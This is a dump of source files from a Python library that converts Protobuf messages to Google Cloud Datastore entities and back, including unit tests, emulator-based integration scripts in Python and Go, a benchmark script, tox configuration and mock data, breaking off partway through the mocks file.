model_pb1.string_key_four = 'four'\n model_pb1.int32_field_one = 111\n model_pb1.int32_field_two = 222\n\n entity_pb1 = model_pb_to_entity_pb(model_pb=model_pb1)\n\n self.assertEqual(entity_pb1.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb1.properties['string_key_one'].exclude_from_indexes, True)\n\n self.assertEqual(entity_pb1.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb1.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb1.properties['string_key_three'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb1.properties['string_key_four'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb1.properties['int32_field_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb1.properties['int32_field_two'].exclude_from_indexes, False)\n\n def test_model_pb_to_entity_pb_repeated_struct_type(self):\n struct1_pb = struct_pb2.Struct()\n struct1_pb.update({\n 'key1': 'struct 1',\n 'key2': 111\n })\n struct2_pb = struct_pb2.Struct()\n struct2_pb.update({\n 'key4': 'struct 2',\n 'key5': 222\n })\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.struct_array_key.append(struct1_pb)\n example_pb.struct_array_key.append(struct2_pb)\n\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb)\n\n self.assertEqual(len(entity_pb.properties['struct_array_key'].array_value.values), 2)\n self.assertEqual(\n entity_pb.properties['struct_array_key'].array_value.values[0]\n .entity_value.properties['key1'].string_value,\n 'struct 1')\n self.assertEqual(\n entity_pb.properties['struct_array_key'].array_value.values[0]\n .entity_value.properties['key2'].double_value,\n 111)\n self.assertEqual(\n entity_pb.properties['struct_array_key'].array_value.values[1]\n .entity_value.properties['key4'].string_value,\n 'struct 2')\n self.assertEqual(\n entity_pb.properties['struct_array_key'].array_value.values[1]\n .entity_value.properties['key5'].double_value,\n 222)\n\n def test_entity_pb_to_model_pb_repeated_struct_field_type(self):\n struct1_pb = struct_pb2.Struct()\n struct1_pb.update({\n 'key1': 'struct 1',\n 'key2': 111,\n 'key3': [1, 2, 3],\n 'key4': {\n 'a': 1\n }\n })\n struct2_pb = struct_pb2.Struct()\n struct2_pb.update({\n 'key5': 'struct 2',\n 'key6': 222,\n 'key7': [4, 5, 6],\n 'key8': {\n 'b': 2\n }\n })\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.struct_array_key.append(struct1_pb)\n example_pb.struct_array_key.append(struct2_pb)\n\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb)\n\n model_pb = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb)\n self.assertEqual(model_pb, example_pb)\n\n def test_model_pb_to_entity_pb_nested_struct_empty_array(self):\n struct1_pb = struct_pb2.Struct()\n struct1_pb.update({\n 'a': {\n 'a': [],\n 'b': {\n 'c': []\n }\n },\n 'b': []\n })\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.struct_key.CopyFrom(struct1_pb)\n\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb)\n\n self.assertEqual(\n entity_pb.properties['struct_key']\n .entity_value.properties['a']\n .entity_value.properties['b']\n .entity_value.properties['c'].array_value,\n entity_pb2.ArrayValue(values=[]))\n\n 
self.assertEqual(\n entity_pb.properties['struct_key']\n .entity_value.properties['b'].array_value,\n entity_pb2.ArrayValue(values=[]))\n\n self.assertEqual(\n entity_pb.properties['struct_key']\n .entity_value.properties['a']\n .entity_value.properties['a'].array_value,\n entity_pb2.ArrayValue(values=[]))\n\n def assertEntityPbHasPopulatedField(self, entity_pb, field_name):\n # type: (entity_pb2.Entity, str) -> None\n \"\"\"\n Assert that the provided Entity protobuf object only has a single field which is provided\n set (aka that field contains a non-falsy value)>\n \"\"\"\n entity = datastore.helpers.entity_from_protobuf(entity_pb)\n entity = dict(entity)\n\n self.assertEqual(len(entity.keys()), 1, 'Provided entity has more than 1 field populated')\n self.assertTrue(field_name in entity.keys(), '%s field is not populated' % (field_name))\n\n def _int_to_double(self, value):\n \"\"\"\n Function which converts any int value type to double to work around issue with\n \"entity_to_protobuf\" function which handles all the nested values as embedded entities and\n not structs which only support double type.\n \"\"\"\n if isinstance(value, list):\n value = [self._int_to_double(item) for item in value]\n elif isinstance(value, dict):\n result = {}\n for dict_key, dict_value in value.items():\n result[dict_key] = self._int_to_double(dict_value)\n\n return result\n elif isinstance(value, bool):\n value = bool(value)\n elif isinstance(value, int):\n value = float(value)\n\n return value\n" }, { "alpha_fraction": 0.6731477975845337, "alphanum_fraction": 0.6774457693099976, "avg_line_length": 31.573333740234375, "blob_id": "27eb788f59dd734c78f0e703957863eccb271942", "content_id": "10375b44ec2b097ab56b3b1687252fe5ec93b866", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4886, "license_type": "permissive", "max_line_length": 97, "num_lines": 150, "path": "/tests/integration/python/python-put-get-db-model.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nimport logging\nimport argparse\n\nimport requests\nfrom google.cloud import datastore\nfrom google.protobuf import json_format\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\nfrom protobuf_cloud_datastore_translator import entity_pb_to_model_pb\nfrom protobuf_cloud_datastore_translator.utils import get_module_and_class_for_model_name\n\nfrom tests.mocks import EmulatorCreds # type: ignore\n\n__all__ = [\n 'get_db_model',\n 'insert_db_model'\n]\n\nLOG = logging.getLogger()\nLOG.setLevel(logging.DEBUG)\n\nhandler = logging.StreamHandler(sys.stderr)\nhandler.setLevel(logging.DEBUG)\n\nLOG.addHandler(handler)\n\nMODEL_NAME = 'compat.example_compat_pb2.ExampleCompatDBModel'\n\n\ndef 
get_db_model(model_name, primary_key):\n # type: (str, str) -> bool\n module, model_class = get_module_and_class_for_model_name(model_name)\n\n # 1. Retrieve model from datastore\n if os.environ.get('DATASTORE_EMULATOR_HOST'):\n client = datastore.Client(credentials=EmulatorCreds(), _http=requests.Session())\n else:\n client = datastore.Client()\n\n model_name = model_name.split('.')[-1]\n key = client.key(model_name, primary_key)\n\n # 2. Convert it into our model pb and JSON serialize it\n LOG.debug('Retrieving model with primary key \"%s\" from database' % (key))\n entity = client.get(key)\n\n if not entity:\n raise ValueError('Entity with key \"%s\" not found' % (key))\n\n entity_pb = datastore.helpers.entity_to_protobuf(entity)\n\n LOG.debug('Converting it from Entity PB to DB model PB')\n\n model_pb = entity_pb_to_model_pb(model_class, entity_pb)\n\n LOG.debug('Serializing Protobuf model as JSON')\n\n model_pb_json = json_format.MessageToJson(\n model_pb, preserving_proto_field_name=True, including_default_value_fields=True\n )\n print(model_pb_json)\n\n return True\n\n\ndef insert_db_model(fixture_path, model_name, primary_key):\n # type: (str, str, str) -> bool\n LOG.debug('Loading fixture from \"%s\"', fixture_path)\n\n # 1. Load in JSON fixture\n with open(fixture_path, 'r') as fp:\n model_pb_json = fp.read()\n\n # 2. Parse it in our custom Protobuf DB model type\n module, model_class = get_module_and_class_for_model_name(model_name)\n\n LOG.debug('Parsing JSON fixture as Protobuf message')\n model_pb = json_format.Parse(model_pb_json, model_class())\n\n # 3. Translate it into Entity PB\n LOG.debug('Translating Protobuf PB to Entity PB')\n entity_pb = model_pb_to_entity_pb(model_pb)\n\n # 4. Store it in Datastore\n if os.environ.get('DATASTORE_EMULATOR_HOST'):\n client = datastore.Client(credentials=EmulatorCreds(), _http=requests.Session())\n else:\n client = datastore.Client()\n\n model_name = model_pb.DESCRIPTOR.name\n key = client.key(model_name, primary_key)\n key_pb = key.to_protobuf()\n entity_pb.key.CopyFrom(key_pb) # pylint: disable=no-member\n\n LOG.debug('Storing it in datastore under primary key \"%s\"', key)\n\n entity_pb = entity = datastore.helpers.entity_from_protobuf(entity_pb)\n client.put(entity)\n return True\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Get / Insert model DB fixture from / to a '\n 'datastore')\n parser.add_argument(\n '--fixture-path', action='store', required=False, help=('Path to the JSON fixture file.')\n )\n parser.add_argument(\n '--operation', action='store', required=True, help=(\n 'Operation name - get / put'\n )\n )\n parser.add_argument(\n '--primary-key', action='store', required=True,\n help=('Primary key to use when writting entity to the datastore.')\n )\n\n args = parser.parse_args()\n\n if args.operation not in ['get', 'put']:\n raise ValueError('Invalid operation: %s' % (args.operation))\n\n if args.operation == 'get':\n get_db_model(model_name=MODEL_NAME, primary_key=args.primary_key)\n elif args.operation == 'put':\n if not args.fixture_path:\n raise ValueError('--fixture-path argument not provided')\n\n insert_db_model(\n fixture_path=args.fixture_path, model_name=MODEL_NAME, primary_key=args.primary_key\n )\n" }, { "alpha_fraction": 0.731686532497406, "alphanum_fraction": 0.7444633841514587, "avg_line_length": 38.13333511352539, "blob_id": "bda2052161f9e61c9f403da4b7827ae1dc791b37", "content_id": "39bf015004c1c19df4ad57130fdeaef0576102cf", "detected_licenses": [ "Python-2.0", 
"Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1174, "license_type": "permissive", "max_line_length": 115, "num_lines": 30, "path": "/scripts/run-benchmarks.sh", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n#Script which runs py.test benchmarks and also compares results to previous run (if previous run\n# exists)\n\nOUTPUT=$(ls -la .benchmarks)\nEXIT_CODE=$?\n\nif [ ${EXIT_CODE} -ne 0 ]; then\n # Previous run doesn't exist yet, create one so we have something to compare against during\n # the next run\n echo \"Previous run doesn't exist, skipping compare...\"\n exec py.test --benchmark-autosave tests/test_benchmarks.py\nelse\n exec py.test --benchmark-autosave --benchmark-compare --benchmark-compare-fail=min:14% tests/test_benchmarks.py\nfi\n" }, { "alpha_fraction": 0.6761219501495361, "alphanum_fraction": 0.6824724674224854, "avg_line_length": 31.356164932250977, "blob_id": "81cd584221f73c20f9d6522e0a36551d25c95db1", "content_id": "8ffa817a2b04005114fb205d727b223b7381cb09", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2362, "license_type": "permissive", "max_line_length": 92, "num_lines": 73, "path": "/protobuf_cloud_datastore_translator/utils.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport importlib\n\nfrom typing import Type\nfrom typing import List\nfrom typing import Tuple\nfrom types import ModuleType\n\nfrom google.protobuf.pyext.cpp_message import GeneratedProtocolMessageType\n\nfrom protobuf_cloud_datastore_translator.translator import exclude_field_from_index\n\n\n__all__ = [\n 'get_module_and_class_for_model_name',\n 'get_exclude_from_index_fields_for_model'\n]\n\n\ndef get_module_and_class_for_model_name(model_name):\n # type: (str) -> Tuple[ModuleType, Type[GeneratedProtocolMessageType]]\n split = model_name.rsplit('.', 1)\n\n if len(split) != 2:\n raise ValueError('Invalid module name: %s' % (model_name))\n\n module_path, class_name = split\n\n try:\n module = importlib.import_module(module_path)\n model_class = getattr(module, 
class_name, None)\n except Exception as e:\n raise ValueError('Class \"%s\" not found: %s. Make sure \"%s\" is in PYTHONPATH' %\n (model_name, module_path, str(e)))\n\n if not model_class:\n raise ValueError('Class \"%s\" not found in module \"%s\"' % (model_name, module_path))\n\n return module, model_class\n\n\ndef get_exclude_from_index_fields_for_model(model_class):\n # type: (Type[GeneratedProtocolMessageType]) -> List[str]\n \"\"\"\n Return a list of fields which are marked as to be excluded for the provided model class.\n \"\"\"\n\n fields = list(iter(model_class.DESCRIPTOR.fields))\n\n result = []\n for field_descriptor in fields:\n exclude_from_index = exclude_field_from_index(model=model_class,\n field_descriptor=field_descriptor)\n\n if exclude_from_index:\n result.append(field_descriptor.name)\n\n return result\n" }, { "alpha_fraction": 0.6223583221435547, "alphanum_fraction": 0.6355283260345459, "avg_line_length": 34.879119873046875, "blob_id": "c53a17397384d1292ec790471dcf450226e01eb2", "content_id": "4010de031eac63e079cbc0239a860386ba3d8ac6", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3265, "license_type": "permissive", "max_line_length": 99, "num_lines": 91, "path": "/tests/integration/base.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport time\nimport unittest\n\nimport requests\nfrom google.cloud import datastore\n\nfrom tests.mocks import EmulatorCreds\n\n__all__ = [\n 'BaseDatastoreIntegrationTestCase'\n]\n\nSTART_EMULATOR_STRING = \"\"\"\ngcloud beta emulators datastore start --host-port=127.0.0.1:8081 --no-store-on-disk --consistency=1\n\"\"\".strip()\n\n\nclass BaseDatastoreIntegrationTestCase(unittest.TestCase):\n\n def setUp(self):\n # type: () -> None\n super(BaseDatastoreIntegrationTestCase, self).setUp()\n\n # Set environment variables which are needed for emulator to work\n os.environ['DATASTORE_DATASET'] = 'translator-tests'\n os.environ['DATASTORE_PROJECT_ID'] = 'translator-tests'\n os.environ['DATASTORE_EMULATOR_HOST'] = 'localhost:8081'\n os.environ['DATASTORE_EMULATOR_HOST_PATH'] = 'localhost:8081/datastore'\n os.environ['DATASTORE_HOST'] = 'http://localhost:8081'\n\n # 1. Verify datastore emulator is running\n try:\n requests.get(os.environ['DATASTORE_HOST'], timeout=1)\n except requests.exceptions.ConnectionError as e:\n raise ValueError('Can\\'t reach \"%s\". Make sure Google Cloud Datastore emulator is '\n 'running and listening on \"%s\": %s.\\n\\nYou can start emulator using \"%s\" '\n 'command.' 
% (os.environ['DATASTORE_HOST'],\n os.environ['DATASTORE_EMULATOR_HOST'], str(e),\n START_EMULATOR_STRING))\n\n # Instantiate client with mock credentials object\n self.client = datastore.Client(credentials=EmulatorCreds(),\n _http=requests.Session())\n self._clear_datastore()\n\n def tearDown(self):\n # type: () -> None\n super(BaseDatastoreIntegrationTestCase, self).tearDown()\n\n self._clear_datastore()\n\n def _clear_datastore(self):\n # type: () -> None\n # Clear datastore, ensure it's empty\n query = self.client.query(kind='__kind__')\n query.keys_only()\n\n kinds = [entity.key.id_or_name for entity in query.fetch()]\n\n for kind in kinds:\n query = self.client.query(kind=kind)\n query.keys_only()\n\n # Work around for eventual consistency nature of the emulator\n for index in range(0, 3):\n entity_keys = [entity.key for entity in query.fetch()]\n self.client.delete_multi(entity_keys)\n time.sleep(0.1)\n\n query = self.client.query(kind=kind)\n query.keys_only()\n result = list(query.fetch())\n\n self.assertEqual(len(result), 0)\n" }, { "alpha_fraction": 0.7064586281776428, "alphanum_fraction": 0.7322205901145935, "avg_line_length": 31.42352867126465, "blob_id": "23fa435d158de16c4f6cb0ff523260d4e64fca76", "content_id": "2b256270afbae58186f1e99bffaa48ebe46df455", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 2756, "license_type": "permissive", "max_line_length": 141, "num_lines": 85, "path": "/tox.ini", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "[tox]\nenvlist = lint,py{2.7,3.6,3.7}-unit-tests,py2.7-integration-tests,py3.7-integration-tests,coverage,py{2.7,3.6,3.7}-benchmarks\nskipsdist = false\n\n[testenv]\nbasepython =\n {py3.7-unit-tests,py3.7-integration-tests,lint,mypy,coverage}: python3.7\n {py2.7-unit-tests,py2.7-integration-tests,py2.7-benchmarks}: python2.7\n {py3.6-unit-tests,py3.6-benchmarks}: python3.6\n {py3.7-unit-tests,py3.7-benchmarks}: python3.7\ninstall_command = pip install -U --force-reinstall {opts} {packages}\ndeps = -r requirements-test.txt\n -r requirements.txt\nsetenv =\n PYTHONPATH = {toxinidir}:{toxinidir}/tests/generated/\nwhitelist_externals =\n rm\n scripts/run-benchmarks.sh\ncommands =\n py.test --benchmark-disable -vv --durations=5 tests/unit/\n\n[testenv:lint]\ndeps = -r requirements-test.txt\n -r requirements-examples.txt\n -r requirements.txt\n mypy==0.730\n mypy-protobuf\ncommands =\n flake8 --config ./lint-configs/.flake8 protobuf_cloud_datastore_translator/ tests/ examples/\n pylint -E --rcfile=./lint-configs/.pylintrc protobuf_cloud_datastore_translator/ tests/ examples/\n mypy --no-incremental --config-file lint-configs/mypy.ini protobuf_cloud_datastore_translator/ tests/unit/ tests/integration/\n\n[testenv:mypy]\ndeps = -r requirements-test.txt\n -r requirements.txt\n mypy==0.730\n mypy-protobuf\ncommands =\n mypy --no-incremental --config-file lint-configs/mypy.ini protobuf_cloud_datastore_translator/ tests/unit/ tests/integration/ examples/\n\n[testenv:py2.7-integration-tests]\ncommands =\n py.test --benchmark-disable -vv --durations=5 tests/integration/\n\n[testenv:py3.7-integration-tests]\ncommands =\n py.test --benchmark-disable -vv --durations=5 tests/integration/\n\n[testenv:coverage]\ncommands =\n rm -f .coverage\n py.test --benchmark-disable --cov=protobuf_cloud_datastore_translator --cov=tests tests/unit/ tests/integration/ tests/test_benchmarks.py\n\n[testenv:coverage-travis]\npassenv = 
TOXENV CI TRAVIS TRAVIS_*\nset-env =\ncommands =\n rm -f .coverage\n py.test --benchmark-disable --cov=protobuf_cloud_datastore_translator tests/unit/ tests/integration/ tests/test_benchmarks.py\n codecov\n\n# Benchmark targets\n[testenv:py2.7-benchmarks]\ncommands =\n py.test --benchmark-autosave tests/test_benchmarks.py\n\n[testenv:py3.6-benchmarks]\ncommands =\n py.test --benchmark-autosave tests/test_benchmarks.py\n\n[testenv:py3.7-benchmarks]\ncommands =\n py.test --benchmark-autosave tests/test_benchmarks.py\n\n[testenv:py2.7-benchmarks-travis]\ncommands =\n {toxinidir}/scripts/run-benchmarks.sh\n\n[testenv:py3.6-benchmarks-travis]\ncommands =\n {toxinidir}/scripts/run-benchmarks.sh\n\n[testenv:py3.7-benchmarks-travis]\ncommands =\n {toxinidir}/scripts/run-benchmarks.sh\n" }, { "alpha_fraction": 0.6974021196365356, "alphanum_fraction": 0.6977680325508118, "avg_line_length": 32.74074172973633, "blob_id": "6b38eb75a5ea9b3999255855cc6b45f6c4283dad", "content_id": "d995cdc90458a98d86634fd9c2ab535f819301df", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2733, "license_type": "permissive", "max_line_length": 115, "num_lines": 81, "path": "/tests/integration/go/go-put-get-db-model.go", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"cloud.google.com/go/datastore\"\n\t\"context\"\n\t\"encoding/json\"\n\t\"flag\"\n\t\"github.com/Kami/python-protobuf-cloud-datastore-entity-translator/tests/generated/go/compat\"\n\ttranslator \"github.com/Sheshagiri/go-protobuf-cloud-datastore-entity-translator/datastore-translator\"\n\t\"github.com/golang/protobuf/jsonpb\"\n\t\"log\"\n\t\"os\"\n)\n\nfunc main() {\n\ttyp := flag.String(\"operation\", \"put/get\", \"put or get from from datastore\")\n\tprimaryKey := flag.String(\"primary-key\", \"\", \"primary key, this will be used as Name in Datastore Key, ex: key-1\")\n\tjsonFile := flag.String(\"fixture-path\", \"\", \"path to json file containing protobuf\")\n\n\tflag.Parse()\n\n\tctx := context.Background()\n\n\tprojectId := os.Getenv(\"DATASTORE_PROJECT_ID\")\n\n\tif projectId == \"\" {\n\t\tprojectId = \"translator-tests\"\n\t}\n\n\tdsClient, err := datastore.NewClient(ctx, projectId)\n\n\tif err != nil {\n\t\tlog.Fatalf(\"unable to connect to datastore, error: %v\", err)\n\t}\n\tdefer dsClient.Close()\n\n\ttranslatedProto := &example_compat.ExampleCompatDBModel{}\n\tkind := \"ExampleCompatDBModel\"\n\n\tif *typ == \"get\" {\n\t\tkey := datastore.NameKey(kind, *primaryKey, nil)\n\t\tlog.Println(\"getting key from datastore: \", key.String())\n\t\tdsEntity, err := dsClient.GetEntity(ctx, key)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"unable to get from datastore, error: %v\", err)\n\t\t}\n\t\terr = translator.DatastoreEntityToProtoMessage(dsEntity, translatedProto, true)\n\t\t// We want to use original field names and not CamelCase ones\n\t\tmarshaller := jsonpb.Marshaler{OrigName: true, EmitDefaults: true}\n\t\tlog.Println(\"dumping the proto message to stdout\")\n\t\terr = marshaller.Marshal(os.Stdout, translatedProto)\n\t\tprettyJson, err := json.MarshalIndent(translatedProto, \"\", \" \")\n\t\tlog.Printf(\"%s\", string(prettyJson))\n\t} else if *typ == \"put\" {\n\t\tdata, err := os.Open(*jsonFile)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"unable to read file %s, error: %v\", *jsonFile, err)\n\t\t}\n\t\terr = jsonpb.Unmarshal(data, translatedProto)\n\t\tif err != nil 
{\n\t\t\tlog.Printf(\"unmarshalling failed, error: %v\", err)\n\t\t}\n\t\tlog.Println(\"Original Proto: \", translatedProto)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"unable to load json, error: %v\", err)\n\t\t}\n\t\ttranslatedEntity, err := translator.ProtoMessageToDatastoreEntity(translatedProto, true)\n\t\tlog.Println(\"Translated Entity:\", translatedEntity)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"unable to translate execution request to datastore format, error: %v\", err)\n\t\t}\n\t\tkey := datastore.NameKey(kind, *primaryKey, nil)\n\t\t_, err = dsClient.PutEntity(ctx, key, &translatedEntity)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"unable to translate execution request to datastore format, error: %v\", err)\n\t\t}\n\t\tlog.Printf(\"key %v is saved to datastore\", key.String())\n\t} else {\n\t\tlog.Fatalf(\"unknown type %s\", *typ)\n\t}\n}\n" }, { "alpha_fraction": 0.5561617612838745, "alphanum_fraction": 0.6135689616203308, "avg_line_length": 30.34200668334961, "blob_id": "d51b3fe4ecdcfa99bd4538e8536ddf13fd2e29ad", "content_id": "58d7548f3ae1a316c26a884b340045676cf6f470", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8443, "license_type": "permissive", "max_line_length": 93, "num_lines": 269, "path": "/tests/mocks.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport datetime\n\nimport google.auth\nimport pytz\nfrom google.type import latlng_pb2\nfrom google.protobuf import struct_pb2\nfrom google.cloud.datastore.helpers import GeoPoint\n\nfrom tests.generated import example_pb2\nfrom tests.generated import example_with_options_pb2\n\n__all__ = [\n 'EXAMPLE_DICT_POPULATED',\n 'EXAMPLE_DICT_DEFAULT_VALUES',\n\n 'EXAMPLE_PB_POPULATED',\n 'EXAMPLE_PB_DEFAULT_VALUES',\n\n 'EXAMPLE_PB_WITH_OPTIONS_1',\n\n 'EmulatorCreds'\n]\n\ndt = datetime.datetime(2019, 12, 12, 10, 00, 00, tzinfo=pytz.UTC)\n\n# Dictionary with example data which can be used with the Entity object\nEXAMPLE_DICT_POPULATED = {\n 'int32_key': 100,\n 'string_key': u'foo bar baz',\n 'bool_key': True,\n 'bytes_key': b'foobytesstring',\n 'double_key': 1.2345,\n 'float_key': float(20.55500030517578),\n 'int64_key': 9223372036854775,\n 'map_string_string': {\n 'foo': u'bar',\n 'bar': u'baz',\n 'unicode': u'čđć'\n },\n 'map_string_int32': {\n 'key1': 20,\n 'key2': 30,\n },\n 'string_array_key': [u'item1', u'item2'],\n 'int32_array_key': [100, 200, 300],\n 'bytes_array_key': [b'a', b'b', b'c'],\n 'complex_array_key': [\n {'string_key': u'value 1', 'int32_key': 12345,\n 'enum_key': example_pb2.ExampleEnumModel.ENUM2},\n {'string_key': u'value 2', 'int32_key': 5000,\n 'enum_key': example_pb2.ExampleEnumModel.ENUM0},\n {'string_key': u'value 3', 'int32_key': 40,\n 'enum_key': example_pb2.ExampleEnumModel.ENUM0},\n ],\n 'struct_array_key': [\n 
{\n 'key1': u'value 1',\n 'key2': [1, 2, 3],\n 'key3': 3333,\n 'key4': {\n 'a': 1\n }\n },\n {\n 'key11': u'value 10',\n 'key12': [10, 11, 12],\n 'key13': 4444,\n 'key14': {\n 'a': 1\n }\n }\n ],\n 'enum_key': example_pb2.ExampleEnumModel.ENUM1,\n 'struct_key': {\n 'key1': u'val1',\n 'key2': 2,\n 'key3': [1, 2, 3, 4.44, None, True, False],\n 'key4': u'čđć',\n 'key5': {\n 'dict_key_1': u'1',\n 'dict_key_2': 30,\n 'dict_key_3': [u'a', u'b', u'c', 7, {u'h': u'bar', u'g': [1, 2, 33.33], u'j': [],\n u'l': True, u'm': False}, None],\n 'dict_key_4': None,\n 'dict_key_5': 55.55\n },\n 'key6': None,\n 'key7': [],\n 'key8': {\n 'a': {\n 'b': {\n 'c': []\n }\n }\n },\n 'key9': True,\n 'key10': False,\n 'key11': 11.123\n },\n 'timestamp_key': dt,\n 'geo_point_key': GeoPoint(-20.2, +160.5),\n 'null_key': None\n}\ngeo_point_value = latlng_pb2.LatLng(latitude=-20.2, longitude=+160.5)\n\nEXAMPLE_DICT_DEFAULT_VALUES = {\n 'bool_key': False,\n 'string_key': u'',\n 'int32_key': 0,\n 'int64_key': 0,\n 'double_key': 0.0,\n 'float_key': 0.0,\n 'enum_key': example_pb2.ExampleEnumModel.ENUM0,\n 'bool_key': False,\n 'bytes_key': b'',\n 'null_key': None,\n 'map_string_string': {},\n 'map_string_int32': {},\n 'string_array_key': [],\n 'int32_array_key': [],\n 'bytes_array_key': [],\n 'complex_array_key': [],\n 'struct_array_key': []\n}\n\n# pylint: disable=no-member\nstruct1_pb = struct_pb2.Struct()\nstruct1_pb.update({\n 'key1': u'value 1',\n 'key2': [1, 2, 3],\n 'key3': 3333,\n 'key4': {\n 'a': 1\n }\n})\n\nstruct2_pb = struct_pb2.Struct()\nstruct2_pb.update({\n 'key11': u'value 10',\n 'key12': [10, 11, 12],\n 'key13': 4444,\n 'key14': {\n 'a': 1\n }\n})\n\nEXAMPLE_PB_POPULATED = example_pb2.ExampleDBModel()\nEXAMPLE_PB_POPULATED.int32_key = 100\nEXAMPLE_PB_POPULATED.string_key = u'foo bar baz'\nEXAMPLE_PB_POPULATED.bool_key = True\nEXAMPLE_PB_POPULATED.bytes_key = b'foobytesstring'\nEXAMPLE_PB_POPULATED.double_key = 1.2345\nEXAMPLE_PB_POPULATED.float_key = float(20.55500030517578)\nEXAMPLE_PB_POPULATED.int64_key = 9223372036854775\nEXAMPLE_PB_POPULATED.map_string_string['foo'] = u'bar'\nEXAMPLE_PB_POPULATED.map_string_string['bar'] = u'baz'\nEXAMPLE_PB_POPULATED.map_string_string['unicode'] = u'čđć'\nEXAMPLE_PB_POPULATED.map_string_int32['key1'] = 20\nEXAMPLE_PB_POPULATED.map_string_int32['key2'] = 